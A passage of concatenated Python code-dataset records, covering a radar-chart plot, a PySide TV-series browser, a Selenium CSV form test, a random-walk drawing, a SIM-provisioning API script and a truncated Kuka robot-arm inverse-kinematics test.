14.4, 14.9, 15.8]\n})\n\ndf2 = df[['Substantive', 'Verben', 'Adjektive', 'Adverben']]\n# ------- PART 1: Define a function that does the plot for one line of the dataset!\n\n\ndef make_spider( row, title, color):\n    # number of variables\n    categories=list(df2)\n    N = len(categories)\n \n    # What will be the angle of each axis in the plot? (we divide the plot / number of variables)\n    angles = [n / float(N) * 2 * pi for n in range(N)]\n    angles += angles[:1]\n \n    # Initialise the spider plot\n    ax = plt.subplot(3,3,row+1, polar=True )\n \n    # If you want the first axis to be on top:\n    ax.set_theta_offset(pi / 2)\n    ax.set_theta_direction(-1)\n \n    # Draw one axis per variable and add labels\n    plt.xticks(angles[:-1], categories, color='grey', size=7)\n    plt.tight_layout()\n \n    # Draw ylabels\n    ax.set_rlabel_position(0)\n    plt.yticks([10,20,30], [\"10\",\"20\",\"30\"], color=\"grey\", size=7)\n    plt.ylim(0,40)\n \n    # Ind1\n    values=df.loc[row].drop('Werkart').values.flatten().tolist()\n    values += values[:1]\n    ax.plot(angles, values, color=color, linewidth=2, linestyle='solid')\n    ax.fill(angles, values, color=color, alpha=0.4)\n \n    # Add a title\n    plt.title(title, size=12, color=color, y=1.2)\n    # some spacing in between\n    plt.tight_layout()\n\n\n# ------- PART 2: Apply to all individuals\n# initialize the figure\nmy_dpi=96\nplt.figure(figsize=(1000/my_dpi, 1000/my_dpi), dpi=my_dpi)\n\n# Create a color palette:\nmy_palette = plt.cm.get_cmap(\"Set2\", len(df.index))\n\n# Loop to plot\nfor row in range(0, len(df.index)):\n    make_spider( row=row, title=df['Werkart'][row], color=my_palette(row))\n\n# show() must come after the subplots are drawn; the original called it\n# before the loop, so the figure appeared empty\nplt.show()\n","sub_path":"txt_edit/Präsentation/radar_chart.py","file_name":"radar_chart.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"115111950","text":"\n\nimport sys\nimport time\n\n# NOTE: no GUI imports were present in the original file; PySide is assumed\n# here because the code uses the @Slot decorator (PyQt names it pyqtSlot).\nfrom PySide.QtCore import Qt, Slot\nfrom PySide.QtGui import (QApplication, QWidget, QFrame, QFont, QHBoxLayout,\n                          QVBoxLayout, QLabel, QLineEdit, QPushButton,\n                          QListWidget, QComboBox, QMessageBox)\n\n# project-local modules used throughout the class (assumed to ship alongside)\nimport helper\nimport seriesfinder\n\ngrabber_app = QApplication(sys.argv)\n\nclass SeriesGrabberGUI(QWidget):\n\n    def __init__(self):\n        # Initialize the object\n        QWidget.__init__(self)\n\n        # Main Window\n        self.setMinimumSize(980, 720)\n        self.setWindowTitle('SeriesGrabber v0.1')\n\n\n        ''' ADD SERIES WINDOW '''\n\n        # Layout for finder window\n        self.search_layout = QVBoxLayout()\n\n        # Main Finder Window\n        self.finder = QWidget()\n        self.finder.resize(400, 400)\n        self.finder.setWindowTitle('Add a series to your library')\n\n        # Add line edit, buttons & search result list\n        self.search_label = QLabel()\n        self.search_label.setText(\"Search TVDB for the series you want to add:\")\n        self.search_layout.addWidget(self.search_label)\n        self.search_line = QLineEdit()\n        self.search_layout.addWidget(self.search_line)\n        self.search_layout.setAlignment(Qt.AlignTop)\n        self.search_button = QPushButton()\n        self.search_button.setText(\"Search\")\n        self.search_button.clicked.connect(self.search_series)\n        self.search_layout.addWidget(self.search_button)\n        self.search_result_list = QListWidget()\n        self.search_layout.addWidget(self.search_result_list)\n        self.choose_selection = QPushButton()\n        self.choose_selection.setText(\"Choose selected series\")\n        self.choose_selection.clicked.connect(self.add_series)\n        self.search_layout.addWidget(self.choose_selection)\n\n        # Waiting window\n        self.wait_window = QWidget()\n        self.wait_window.resize(250, 50)\n        self.wait_window.setWindowTitle(\"Processing...\")\n        self.wait_layout = QVBoxLayout()\n        self.wait_label = QLabel()\n        self.wait_label.setText(\"Loading series data...\")\n        self.wait_layout.addWidget(self.wait_label)\n        self.wait_layout.setAlignment(Qt.AlignCenter)\n        self.wait_window.setLayout(self.wait_layout)\n\n        # Set finder layout\n        self.finder.setLayout(self.search_layout)\n\n\n        ''' MAIN WINDOW '''\n\n        # Layouts\n        
self.layout = QHBoxLayout()\n self.left_side = QVBoxLayout()\n self.right_side = QVBoxLayout()\n self.episode_list_Layout = QHBoxLayout()\n\n ''' Left side of main window '''\n\n # List widget for series selection\n self.series_list = QListWidget(self)\n dict_series = helper.series_dict()\n items = dict_series.keys()\n self.series_list.addItems(items)\n #self.series_list.setFrameStyle(QFrame.Panel | QFrame.Plain)\n #self.series_list.setLineWidth(2)\n self.series_list.setFixedWidth(200)\n self.left_side.addWidget(self.series_list)\n\n # Button to add new series to library\n self.add_button = QPushButton(\"Add series\", self)\n self.add_button.setMinimumHeight(40)\n self.add_button.clicked.connect(self.open_finder)\n self.left_side.addWidget(self.add_button)\n\n ''' Right side of main window '''\n\n # Label for list widget\n self.banner = QLabel(self)\n self.banner.setAlignment(Qt.AlignTop)\n self.banner.setFrameStyle(QFrame.Panel | QFrame.Plain)\n self.banner.setLineWidth(2)\n self.banner.setMaximumHeight(140)\n self.right_side.addWidget(self.banner)\n\n # Label for description\n self.description = QLabel(self)\n self.description.setAlignment(Qt.AlignTop)\n self.description.setWordWrap(True)\n self.right_side.addWidget(self.description)\n\n # line1\n self.line1 = QLabel()\n self.line1.setFrameStyle(QFrame.HLine | QFrame.Plain)\n self.line1.setLineWidth(1)\n self.line1.setMaximumHeight(10)\n self.right_side.addWidget(self.line1)\n\n # ComboBox for season selection\n self.season_box = QHBoxLayout()\n self.season_capt = QLabel()\n self.season_capt.setText(\"Choose season:\")\n self.season_capt.setFixedWidth(80)\n self.season_sel = QComboBox()\n self.season_box.addWidget(self.season_capt)\n self.season_box.addWidget(self.season_sel)\n self.right_side.addLayout(self.season_box)\n\n # Episode line2\n self.line2 = QLabel()\n self.line2.setFrameStyle(QFrame.HLine | QFrame.Sunken)\n self.line2.setLineWidth(1)\n self.line2.setMaximumHeight(5)\n self.right_side.addWidget(self.line2)\n\n # Episode layout\n self.episode_list = QListWidget()\n self.episode_list_info = QVBoxLayout()\n self.episode_name = QLabel()\n self.episode_info_text = QLabel()\n self.episode_rating = QLabel()\n self.episode_airdate = QLabel()\n self.episode_banner = QLabel()\n self.episode_banner.setAlignment(Qt.AlignCenter)\n self.episode_banner.setFrameStyle(QFrame.Panel | QFrame.Plain)\n self.episode_banner.setMinimumHeight(200)\n self.hline_episode_info = QLabel()\n self.episode_download = QPushButton()\n self.episode_download.setText(\"Download now!\")\n self.episode_info_text.setWordWrap(True)\n self.episode_banner.setText(\"(No episode selected)\")\n self.episode_name.setText(\"Name: No episode selected\")\n self.episode_info_text.setText(\"Description: No episode selected\")\n self.episode_rating.setText(\"TVDB-Rating: No episode selected\")\n self.episode_airdate.setText(\"Originally aired: No episode selected\")\n self.hline_episode_info.setFrameStyle(QFrame.Panel | QFrame.Sunken)\n self.hline_episode_info.setLineWidth(1)\n self.hline_episode_info.setFixedHeight(5)\n fixedWidth = 400\n self.episode_banner.setFixedWidth(fixedWidth)\n self.episode_name.setFixedWidth(fixedWidth)\n self.episode_rating.setFixedWidth(fixedWidth)\n self.episode_info_text.setFixedWidth(fixedWidth)\n self.episode_airdate.setFixedWidth(fixedWidth)\n self.episode_list_info.addWidget(self.episode_banner)\n self.episode_list_info.addWidget(self.episode_name)\n self.episode_list_info.addWidget(self.hline_episode_info)\n 
self.episode_list_info.addWidget(self.episode_rating)\n self.episode_list_info.addWidget(self.episode_airdate)\n self.episode_list_info.addWidget(self.episode_info_text)\n self.episode_list_info.addWidget(self.episode_download)\n self.episode_list_info.setAlignment(Qt.AlignTop)\n self.episode_list_Layout.addWidget(self.episode_list)\n self.episode_list_Layout.addLayout(self.episode_list_info)\n self.right_side.addLayout(self.episode_list_Layout)\n\n # Bottom layout\n self.bottom_layout = QHBoxLayout()\n self.status = QLabel()\n self.rating = QLabel()\n self.delete_button = QPushButton()\n \n self.exit_button = QPushButton()\n self.status.setText(\"Current status: Continuing\")\n self.rating.setText(\"TVDB Rating: 9.0 / 10.0\")\n self.status.setFrameStyle(QFrame.Box | QFrame.Sunken)\n self.rating.setFrameStyle(QFrame.Box | QFrame.Sunken)\n self.status.setAlignment(Qt.AlignCenter)\n self.rating.setAlignment(Qt.AlignCenter)\n self.delete_button.setText(\"Delete series from library\")\n self.exit_button.setText(\"Quit\")\n self.status.setFixedHeight(40)\n self.rating.setFixedHeight(40)\n self.delete_button.setFixedHeight(40)\n self.exit_button.setFixedHeight(40)\n self.exit_button.setFixedWidth(150)\n self.bottom_layout.addWidget(self.status)\n self.bottom_layout.addWidget(self.rating)\n self.bottom_layout.addWidget(self.delete_button)\n self.bottom_layout.addWidget(self.exit_button)\n self.bottom_layout.setAlignment(Qt.AlignBottom)\n self.right_side.addLayout(self.bottom_layout)\n\n # Connect signals\n self.series_list.currentItemChanged.connect(self.change_list_selection)\n self.season_sel.currentIndexChanged.connect(self.change_season_selection)\n self.episode_list.currentItemChanged.connect(self.change_episode_selection)\n self.exit_button.clicked.connect(self.exit_app)\n self.delete_button.clicked.connect(self.delete_series)\n\n # Add layouts to main window\n self.right_side.setAlignment(Qt.AlignTop)\n self.layout.addLayout(self.left_side)\n self.layout.addLayout(self.right_side)\n\n # Set main layout\n self.setLayout(self.layout)\n \n ''' StyleSheets '''\n self.series_list.setStyleSheet(\"QListWidget { background-color: lightblue; selection-color: blue }\")\n self.series_list.setFont(QFont(\"Calibri\", 12))\n self.series_list.setMouseTracking(True)\n self.setStyleSheet(\"background-color: lightblue\")\n self.series_list.setStyleSheet(\"QListView::item:hover { background: yellow}\")\n self.wait_window.setStyleSheet(\"color: rgb(240, 172, 15)\")\n\n\n @Slot()\n def search_series(self):\n searchstring = self.search_line.text()\n if searchstring == \"\":\n self.msg = QMessageBox()\n self.msg.setWindowTitle(\"Error!\")\n self.msg.setText(\"You did not enter anything in the search line!\")\n self.msg.exec_()\n else:\n self.search_result_list.clear()\n results = seriesfinder.get_search_results(searchstring)\n self.search_result_list.addItems(results)\n\n\n @Slot()\n def add_series(self):\n selected_item = self.search_result_list.currentItem().text()\n series_dict = helper.series_dict()\n series_dict[selected_item] = \"\"\n items = series_dict.keys()\n self.series_list.clear()\n self.series_list.addItems(items)\n helper.update_series_dict(series_dict)\n self.finder.close()\n\n\n @Slot()\n def delete_series(self):\n try:\n selected_item = self.series_list.currentItem().text()\n except:\n self.msg = QMessageBox()\n self.msg.setWindowTitle(\"Error!\")\n self.msg.setText(\"An error occured while deleting you series from the library. 
Try again!\")\n self.msg.exec_()\n return None\n \n reply = QMessageBox.question(self, 'Message',\n \"Are you sure you want to remove \" + selected_item + \" from your library?\" , QMessageBox.Yes |\n QMessageBox.No, QMessageBox.No)\n\n if reply == QMessageBox.Yes:\n series_dict = helper.series_dict()\n del series_dict[selected_item]\n items = series_dict.keys()\n self.series_list.clear()\n self.series_list.addItems(items)\n helper.update_series_dict(series_dict)\n \n \n @Slot()\n def change_list_selection(self, current, previous):\n self.wait_window.show()\n try:\n previous.setFont(QFont(\"Calibri\", 12))\n except:\n pass\n self.wait_label.setText(\"Loading series data...\")\n try:\n current_sel = self.series_list.currentItem().text()\n except:\n self.wait_window.close()\n return None\n self.banner.setPixmap(seriesfinder.get_image(current_sel))\n self.description.setText(seriesfinder.get_description(current_sel))\n\n seasons = seriesfinder.get_seasons(current_sel)\n self.season_sel.clear()\n for key in seasons:\n item = str(key)\n self.season_sel.addItem(item)\n\n current_season = int(self.season_sel.currentText())\n episodes = seriesfinder.get_episodes(current_sel, current_season)\n self.episode_list.clear()\n for episode in episodes:\n episodename = seriesfinder.get_episode_name(current_sel, current_season, episode)\n if episodename == None:\n episodename = \"Unknown episode / No name returned from TVDB\"\n if episode < 10:\n episode_no = \"0\" + str(episode)\n else:\n episode_no = str(episode)\n self.episode_list.addItem(episode_no + \" \" + episodename)\n self.wait_window.close()\n current.setFont(QFont(\"Calibri\", 14, QFont.Bold))\n \n \n @Slot()\n def change_season_selection(self):\n self.wait_window.show()\n self.wait_label.setText(\"Loading series data...\")\n current_sel = self.series_list.currentItem().text()\n current_season = self.season_sel.currentText()\n if current_season == '':\n current_season = 1\n else:\n current_season = int(current_season)\n episodes = seriesfinder.get_episodes(current_sel, current_season)\n self.episode_list.clear()\n for episode in episodes:\n episodename = seriesfinder.get_episode_name(current_sel, current_season, episode)\n if episodename == None:\n episodename = \"Unknown episode / No name returned from TVDB\"\n if episode < 10:\n episode_no = \"0\" + str(episode)\n else:\n episode_no = str(episode)\n self.episode_list.addItem(episode_no + \" \" + episodename)\n self.wait_window.close()\n \n @Slot()\n def change_episode_selection(self):\n current_series = self.series_list.currentItem().text()\n current_season = self.season_sel.currentText()\n if current_season == '':\n current_season = 1\n else:\n current_season = int(current_season)\n try:\n current_episode = int(self.episode_list.currentItem().text()[:2])\n except:\n current_episode = 1\n # Name\n self.episode_name.setText(seriesfinder.get_episode_name(current_series, current_season, current_episode))\n\n # Description\n description = seriesfinder.get_episode_info(current_series, current_season, current_episode)\n if description == None:\n description = \"No description available.\"\n self.episode_info_text.setText(\"Description: \" + description)\n\n # Air date\n air_date = seriesfinder.get_air_date(current_series, current_season, current_episode)\n if air_date == None:\n self.episode_airdate.setText(\"Originally aired: unknown\")\n else:\n self.episode_airdate.setText(\"Originally aired: \" + air_date)\n\n # Rating\n rating = seriesfinder.get_episode_rating(current_series, current_season, 
current_episode)\n        if rating == None:\n            rating = \"TVDB-Rating: No rating available for this episode\"\n            self.episode_rating.setText(rating)\n        else:\n            self.episode_rating.setText(\"TVDB-Rating: \" + rating)\n\n        # Banner\n        try:\n            banner = seriesfinder.get_episode_image(current_series, current_season, current_episode)\n            self.episode_banner.setPixmap(banner)\n        except:\n            self.episode_banner.setText(\"(No banner available)\")\n    \n    \n    @Slot()\n    def exit_app(self):\n        reply = QMessageBox.question(self, 'Message',\n            \"Are you sure you want to quit?\", QMessageBox.Yes |\n            QMessageBox.No, QMessageBox.No)\n\n        if reply == QMessageBox.Yes:\n            grabber_app.quit()\n\n\n    @Slot()\n    def open_finder(self):\n        self.finder.show()\n\n    \n    def reset_series_list_font(self):\n        self.series_list.setFont(QFont(\"Calibri\", 12))\n\n    def get_current_selection(self):\n        current_sel = self.series_list.currentRow()\n        return current_sel\n\n    def clearLayout(self, layout):  # 'self' was missing, yet the body calls self.clearLayout\n        while layout.count():\n            child = layout.takeAt(0)\n            if child.widget() is not None:\n                child.widget().deleteLater()\n            elif child.layout() is not None:\n                self.clearLayout(child.layout())\n\n    def run(self):\n        ''' Show the application window and start the main event loop '''\n        self.show()\n        grabber_app.exec_()\n\nif __name__ == '__main__':\n    app = SeriesGrabberGUI()\n    app.run()","sub_path":"old trys/gui_new_layout.py","file_name":"gui_new_layout.py","file_ext":"py","file_size_in_byte":15986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
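change_list_selection and change_season_selection in the PySide GUI above duplicate the episode-list population verbatim; a sketch of the extracted helper (method and attribute names taken from the class itself):

    def populate_episode_list(self, series, season):
        self.episode_list.clear()
        for episode in seriesfinder.get_episodes(series, season):
            name = seriesfinder.get_episode_name(series, season, episode)
            if name is None:
                name = "Unknown episode / No name returned from TVDB"
            # %02d reproduces the manual "0" + str(episode) zero padding
            self.episode_list.addItem("%02d %s" % (episode, name))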
+{"seq_id":"453692552","text":"import csv\nimport os\n\nfrom selenium import webdriver\nimport time\n\ndriver = webdriver.Chrome()\n\ndriver.get('http://localhost:9999/another_form.html')\n\ndef find_and_clear(id):\n    element = driver.find_element_by_id(id)\n    element.clear()\n    return element\n\ninput_csv_content = []\n\nwith open('table_in.csv', encoding='utf-8') as csvfile:\n    input_csv = csv.reader(csvfile, delimiter=',')  # tell the csv reader what to read and which delimiter was used (can be , or ; etc.)\n    next(input_csv)  # needed because the first row is just the header and holds no actual values\n    for row in input_csv:\n        input_csv_content.append(row)\n        find_and_clear(\"fullname\").send_keys(row[0])\n\n        find_and_clear(\"email\").send_keys(row[1])\n\n        find_and_clear(\"dob\").send_keys(row[2])\n\n        find_and_clear(\"phone\").send_keys(row[3])\n\n        submit = driver.find_element_by_id(\"submit\")\n        submit.click()\n\n\n\n    # name = driver.find_element_by_id(\"fullname\")\n    # name.clear()\n    # name.send_keys(row[0])\n    # time.sleep(2)\n    #\n    # email = driver.find_element_by_id(\"email\")\n    # email.clear()\n    # email.send_keys(row[1])\n    # time.sleep(2)\n    #\n    # dob = driver.find_element_by_id(\"dob\")\n    # dob.clear()\n    # dob.send_keys(row[2])\n    # time.sleep(2)\n    #\n    # phone = driver.find_element_by_id(\"phone\")\n    # phone.clear()\n    # phone.send_keys(row[3])\n    # time.sleep(2)\n    #\n    # submit = driver.find_element_by_id(\"submit\")\n    # submit.click()\n\ndriver.find_element_by_xpath(\"/html/body/main/div/button\").click()\n# export_button.click()\ntime.sleep(1)\n\n\n\n\n# table_list = driver.find_elements_by_xpath(\"//table[@id='detailsTable']/tbody/tr\")\n\n# for row in table_list:\n#     cells = row.find_elements_by_tag_name(\"td\")\n#     # print(cells[0].text, cells[1].text, cells[2].text)\n#     print(type(cells))\n#     print(cells[0])\n\nresult_csv_content = []\n\nwith open(\"C:\\\\Users\\\\czink\\\\Downloads\\\\table.csv\", encoding='utf-8') as result_file:\n    result_csv = csv.reader(result_file, delimiter=',')  # tell the csv reader what to read and which delimiter was used (can be , or ; etc.)\n    print(result_csv)\n    next(result_csv)  # needed because the first row is just the header and holds no actual values\n    for row in result_csv:\n        result_csv_content.append(row)\n\n\nprint(type(input_csv_content))\nprint(input_csv_content)\nprint(type(result_csv_content))\nprint(result_csv_content)\n\n\n\nassert input_csv_content == result_csv_content\n\n\nos.remove(\"C:\\\\Users\\\\czink\\\\Downloads\\\\table.csv\")  # delete the generated csv so the test can be repeated\n\n\n\ntime.sleep(2)\n\ndriver.close()","sub_path":"selenium2-homework/csvfeltoltes.py","file_name":"csvfeltoltes.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
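Both CSV files in the Selenium test above are read with the same four lines; a small helper keeps the round-trip comparison symmetric (the hard-coded Downloads path is unchanged and remains the caller's concern):

def read_csv_rows(path):
    with open(path, encoding='utf-8') as f:
        reader = csv.reader(f, delimiter=',')
        next(reader)  # skip the header row
        return [row for row in reader]

assert read_csv_rows('table_in.csv') == read_csv_rows("C:\\Users\\czink\\Downloads\\table.csv")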
+{"seq_id":"438112710","text":"# Program: plot_random.py\r\n\r\nfrom graphics import *\r\nfrom random import *\r\nimport math\r\n\r\ndef main():\r\n\r\n    win = GraphWin(\"2d Random Walk\", 650, 650)\r\n    win.setCoords(-100.0,-100.0,100.0,100.0)\r\n\r\n    # Draw the interface.\r\n\r\n    Text(Point(-20,-70), \"Enter the number of steps for the random walk: \").draw(win)\r\n    input = Entry(Point(45,-70),10)\r\n    input.setText(\"1\")\r\n    input.draw(win)\r\n\r\n    button = Text(Point(0,-85),\"Start the Simulation\")\r\n    button.draw(win)\r\n    Rectangle(Point(-25,-90),Point(25,-80)).draw(win)\r\n\r\n    # Wait for a mouse click.\r\n    \r\n    win.getMouse()\r\n\r\n    # Change the button.\r\n\r\n    button.setText(\"Simulation in Progress\")\r\n\r\n    # Get the number of steps from the Entry box.\r\n    \r\n    N = eval(input.getText())\r\n\r\n    # (x, y) gives the location of the sailor. (x_new,y_new)\r\n    # gives the new location after taking one step. r gives\r\n    # the length of a step.\r\n\r\n    x = 0\r\n    y = 0\r\n    x_new = 0\r\n    y_new = 0\r\n\r\n    # NB. r sets the step length; smaller values give a finer-grained walk.\r\n\r\n    r = 3\r\n\r\n    # Each step moves a distance r in a uniformly random direction. Steps\r\n    # that would leave the disc of radius R = 65 are projected back onto\r\n    # the boundary of the disc.\r\n\r\n    for i in range(N):\r\n        theta = 2*math.pi*random()\r\n        R = 65\r\n        x_new = x+r*math.cos(theta)\r\n        y_new = y+r*math.sin(theta)\r\n        # measure the distance of the *new* point; the original computed D\r\n        # before updating x_new/y_new, so the boundary check lagged a step\r\n        D = (x_new**2+y_new**2)**0.5\r\n        if D>R:\r\n            x_new = x_new*R/D\r\n            y_new = y_new*R/D\r\n        \r\n        p = Point(x,y)\r\n        q = Point(x_new,y_new)\r\n        l = Line(p,q)\r\n        l.draw(win)\r\n        x = x_new\r\n        y = y_new\r\n\r\n\r\n    # Change the button.\r\n\r\n    button.setText(\"Quit\")\r\n\r\n    # Wait for click and then quit.\r\n\r\n    win.getMouse()\r\n    win.close()\r\n    \r\nif __name__=='__main__':main()\r\n","sub_path":"tutorials/Intro to Computer Science with python_NUIG/Projects/random_walk.py","file_name":"random_walk.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"144879421","text":"import ipaddress\n\nimport ssmc\nfrom examples.util import set_env, get_logger, measure\n\nlogger = get_logger()\n# logger.setLevel(logging.INFO)\n\n# get config\nconf = set_env()\n\n# create api client\napi = ssmc.APIClient(token=conf.token, secret=conf.secret, zone=conf.zone, debug=conf.debug)\n\n# const\n# L2_MODE_START_IP = ipaddress.IPv4Address('10.0.1.1')\nL3_MODE_START_IP = ipaddress.IPv4Address('10.16.1.1')\n\nmgws, paging = api.list_mgws()\nmgw = mgws[0]\n\n# activate sim\nsize, offset = 5000, 0\niter_num = 0\nwith measure(f\"assign sims - size={size}\", logger):\n    while True:\n        sims, paging = api.list_sims(size=size, offset=offset)\n        total = paging.total\n        offset = paging.size + paging.offset\n\n        with measure(f\"setup sims: num_of_sims={len(sims)}\", logger):\n            for sim in sims:\n                iter_num += 1\n\n                # get sim status to check before issuing PUT requests\n                sim_status = api.get_sim_status(sim.id)\n                # activate sim\n                if not sim_status.activated:\n                    with measure(f\"activate_sim: total={total}, sim_id={sim.id}\", logger):\n                        api.activate_sim(sim.id)\n                # assign to mgw\n                if sim_status.simgroup_id is None:\n                    with measure(f\"assign_sim_to_mgw: total={total}, sim_id={sim.id}, mgw_id={mgw.id}\", logger):\n                        api.assign_sim_to_mgw(mgw.id, sim.id)\n                # set ip\n                if sim_status.ip is None:\n                    with measure(f\"set_ip: total={total}, sim_id={sim.id}\", logger):\n                        api.set_ip(sim_id=sim.id, ip=str(L3_MODE_START_IP + iter_num))\n                # imei lock\n                dummy_imei = \"123456789012345\"\n                if not sim_status.imei_lock:\n                    with measure(f\"lock_imei: total={total}, sim_id={sim.id}\", logger):\n                        api.lock_imei(sim_id=sim.id, imei=dummy_imei)\n\n        if offset >= total:\n            break\n","sub_path":"examples/assign_sim_to_mgw.py","file_name":"assign_sim_to_mgw.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"112884923","text":"from sympy import *\nfrom time import time\nfrom mpmath import radians, pi\nimport tf\n\n'''\nFormat of test case is [ [[EE position],[EE orientation as quaternions]],[WC location],[joint angles]]\nYou can generate additional test cases by setting up your kuka project and running `$ roslaunch kuka_arm forward_kinematics.launch`\nFrom here you can adjust the joint angles to find thetas, use the gripper to extract positions and orientation (in quaternion xyzw) and lastly use link 5\nto find the position of the wrist center. 
These newly generated test cases can be added to the test_cases dictionary.\n'''\n\ntest_cases = {1:[[[2.16135,-1.42635,1.55109],\n [0.708611,0.186356,-0.157931,0.661967]],\n [1.89451,-1.44302,1.69366],\n [-0.65,0.45,-0.36,0.95,0.79,0.49]],\n 2:[[[-0.56754,0.93663,3.0038],\n [0.62073, 0.48318,0.38759,0.480629]],\n [-0.638,0.64198,2.9988],\n [-0.79,-0.11,-2.33,1.94,1.14,-3.68]],\n 3:[[[-1.3863,0.02074,0.90986],\n [0.01735,-0.2179,0.9025,0.371016]],\n [-1.1669,-0.17989,0.85137],\n [-2.99,-0.12,0.94,4.06,1.29,-4.12]],\n 4:[],\n 5:[]}\n\n## Helper rotation functions\ndef rot_x(angle):\n return N(Matrix([[ 1, 0, 0, 0],\n [ 0, cos(angle), -sin(angle), 0],\n [ 0, sin(angle), cos(angle), 0],\n [ 0, 0, 0, 1]]))\n\ndef rot_z(angle):\n return N(Matrix([[ cos(angle), -sin(angle), 0, 0],\n [ sin(angle), cos(angle), 0, 0],\n [ 0, 0, 1, 0],\n [ 0, 0, 0, 1]]))\n\ndef rot_y(angle):\n return N(Matrix([[ cos(angle), 0, sin(angle), 0],\n [ 0, 1, 0, 0],\n [ -sin(angle), 0, cos(angle), 0],\n [ 0, 0, 0, 1]]))\n\n# Calculates the norm only for the 3 first coordinates (useful for 4d vecs)\ndef norm3d(vec):\n return Matrix(vec[0:3]).norm()\n\n# Variable DH params (related to joint angles)\nq1, q2, q3, q4, q5, q6, q7 = symbols('q1:8') # theeta values of dh-params\njoint_vals = {q1: 0, q2: -pi/2, q3: 0, q4: 0, q5: 0, q6: 0, q7: 0} # updated when q changes\n\n# Kuka KR210 constant DH params\na0, a1, a2, a3, a4, a5, a6 = 0, 0.35, 1.25, -0.054, 0, 0, 0\nd1 = 0.33 + 0.427 # floor to joint 2 height\nd4 = 0.96 + 0.54 # z3 to wrist center horizontal distance\nd7 = 0.11 + 0.193 # wrist center to end-effector distance\nd2, d3, d5, d6 = 0, 0, 0, 0\np0, p1, p2, p3, p4, p5, p6 = 0, -pi/2, 0, -pi/2, pi/2, -pi/2, 0\n\n# some useful distances\nd3_wc = sqrt(a3**2 + d4**2) # joint 3 to wrist-center distance\nd2_3 = a2 # distance from joint 2 to 3\n\n# Transformation matrices (most of them could be very simplified)\nT0_1 = Matrix([[cos(q1), -sin(q1), 0, a0 ],\n [sin(q1)*cos(p0), cos(q1)*cos(p0), -sin(p0), -sin(p0)*d1],\n [sin(q1)*sin(p0), cos(q1)*sin(p0), cos(p0), cos(p0)*d1 ],\n [ 0, 0, 0, 1 ]])\n\nT1_2 = Matrix([[cos(q2), -sin(q2), 0, a1 ],\n [sin(q2)*cos(p1), cos(q2)*cos(p1), -sin(p1), -sin(p1)*d2],\n [sin(q2)*sin(p1), cos(q2)*sin(p1), cos(p1), cos(p1)*d2 ],\n [ 0, 0, 0, 1 ]])\n\nT2_3 = Matrix([[cos(q3), -sin(q3), 0, a2 ],\n [sin(q3)*cos(p2), cos(q3)*cos(p2), -sin(p2), -sin(p2)*d3],\n [sin(q3)*sin(p2), cos(q3)*sin(p2), cos(p2), cos(p2)*d3 ],\n [ 0, 0, 0, 1 ]])\n\nT3_4 = Matrix([[cos(q4), -sin(q4), 0, a3 ],\n [sin(q4)*cos(p3), cos(q4)*cos(p3), -sin(p3), -sin(p3)*d4],\n [sin(q4)*sin(p3), cos(q4)*sin(p3), cos(p3), cos(p3)*d4 ],\n [ 0, 0, 0, 1 ]])\n\nT4_5 = Matrix([[cos(q5), -sin(q5), 0, a4 ],\n [sin(q5)*cos(p4), cos(q5)*cos(p4), -sin(p4), -sin(p4)*d5],\n [sin(q5)*sin(p4), cos(q5)*sin(p4), cos(p4), cos(p4)*d5 ],\n [ 0, 0, 0, 1 ]])\n\nT5_6 = Matrix([[cos(q6), -sin(q6), 0, a5 ],\n [sin(q6)*cos(p5), cos(q6)*cos(p5), -sin(p5), -sin(p5)*d6],\n [sin(q6)*sin(p5), cos(q6)*sin(p5), cos(p5), cos(p5)*d6 ],\n [ 0, 0, 0, 1 ]])\n\nT6_7 = Matrix([[cos(q7), -sin(q7), 0, a6 ],\n [sin(q7)*cos(p6), cos(q7)*cos(p6), -sin(p6), -sin(p6)*d7],\n [sin(q7)*sin(p6), cos(q7)*sin(p6), cos(p6), cos(p6)*d7 ],\n [ 0, 0, 0, 1 ]])\n\n# Correction matrices from/to Gazebo coords to DH coords\nR_gazebo_to_dh = N(simplify(rot_x(pi) * rot_y(pi/2)))\nR_dh_to_gazebo = N(simplify(rot_z(pi) * rot_y(-pi/2)))\n\n# Extract rotation matrices from the transformation matrices\nR0_1 = T0_1[0:3, 0:3]\nR1_2 = T1_2[0:3, 0:3]\nR2_3 = T2_3[0:3, 0:3]\nR3_4 = T3_4[0:3, 0:3]\nR4_5 = T4_5[0:3, 
0:3]\nR5_6 = T5_6[0:3, 0:3]\nR6_7 = T6_7[0:3, 0:3]\n\n\ndef test_code(test_case):\n ## Set up code\n ## Do not modify!\n x = 0\n class Position:\n def __init__(self,EE_pos):\n self.x = EE_pos[0]\n self.y = EE_pos[1]\n self.z = EE_pos[2]\n class Orientation:\n def __init__(self,EE_ori):\n self.x = EE_ori[0]\n self.y = EE_ori[1]\n self.z = EE_ori[2]\n self.w = EE_ori[3]\n\n position = Position(test_case[0][0])\n orientation = Orientation(test_case[0][1])\n\n class Combine:\n def __init__(self,position,orientation):\n self.position = position\n self.orientation = orientation\n\n comb = Combine(position,orientation)\n\n class Pose:\n def __init__(self,comb):\n self.poses = [comb]\n\n req = Pose(comb)\n start_time = time()\n \n ########################################################################################\n ## \n\n ## Insert IK code here!\n px = req.poses[0].position.x\n py = req.poses[0].position.y\n pz = req.poses[0].position.z\n (roll, pitch, yaw) = tf.transformations.euler_from_quaternion(\n [req.poses[x].orientation.x, req.poses[x].orientation.y,\n req.poses[x].orientation.z, req.poses[x].orientation.w])\n\n ### Your IK code here\n p_end_effector = N(Matrix([[px], [py], [pz], [1]]))\n\n # Calculate joint angles using Geometric IK method\n Rrpy_gazebo = N(rot_z(yaw) * rot_y(pitch) * rot_x(roll))\n versor_x_gazebo = Rrpy_gazebo[:, 0]\n p_wc = N(p_end_effector - versor_x_gazebo * d7) # wrist-center position\n theta1 = atan2(p_wc[1], p_wc[0])\n # Position of joint-2 (x, y, z and placeholder for 4th coord)\n p_j2 = Matrix([a1 * cos(theta1), a1 * sin(theta1), d1, 0])\n vec_j2_to_wc = p_wc - 